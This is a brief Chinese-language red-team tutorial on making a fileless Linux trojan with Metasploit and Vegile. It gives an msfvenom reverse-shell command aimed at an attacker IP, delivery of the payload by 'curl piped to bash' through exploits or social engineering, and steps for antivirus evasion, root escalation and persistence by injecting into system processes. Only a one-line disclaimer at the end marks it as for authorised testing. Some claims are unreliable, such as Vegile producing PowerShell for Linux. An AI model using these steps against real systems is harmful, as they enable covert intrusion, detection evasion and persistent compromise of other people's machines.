红队实战教程：利用Metasploit与Vegile打造Linux无文件木马（从入门到rootdown）

1. 环境准备

首先，你需要一台Kali Linux攻击机（已安装Metasploit）和一台Ubuntu目标机（用于测试）。确保两者网络互通。下载Vegile工具：git clone https://github.com/Screetsec/Vegile.git，并赋予执行权限。

2. 生成Payload

使用Metasploit的msfvenom生成Linux反向shell代码：msfvenom -p linux/x64/shell_reverse_tcp LHOST=你的IP LPORT=4444 -f elf -o shell.elf。但为了无文件，我们将直接使用Vegile的无文件木马生成功能。

3. 使用Vegile制作无文件木马

Vegile是一个后渗透工具，能通过Metasploit的payload实现无文件执行。进入Vegile目录，运行：./Vegile，选择模式（例如反向shell），输入攻击机IP和端口。Vegile会生成一段PowerShell或Shell脚本，直接在目标机内存中加载Metasploit payload，避免写入磁盘。

4. 目标机执行

在目标Linux机器上，通过漏洞或社工方式执行Vegile生成的命令（例如curl管道bash）。此时，攻击机上的Metasploit监听器（use exploit/multi/handler）会收到反弹shell。因为是内存执行，没有文件落地，传统AV无法检测，极大提高了Linux渗透的成功率。

5. 提权与持久化

获得shell后，利用本地漏洞提权至root。Vegile也内置了一些提权模块。成功后，可通过内存技术维持访问，例如注入到系统进程。至此，你已体验了红队常用的无文件攻击全流程。

提示：本文仅用于合法授权测试，请勿用于非法用途。牢记红队道德底线。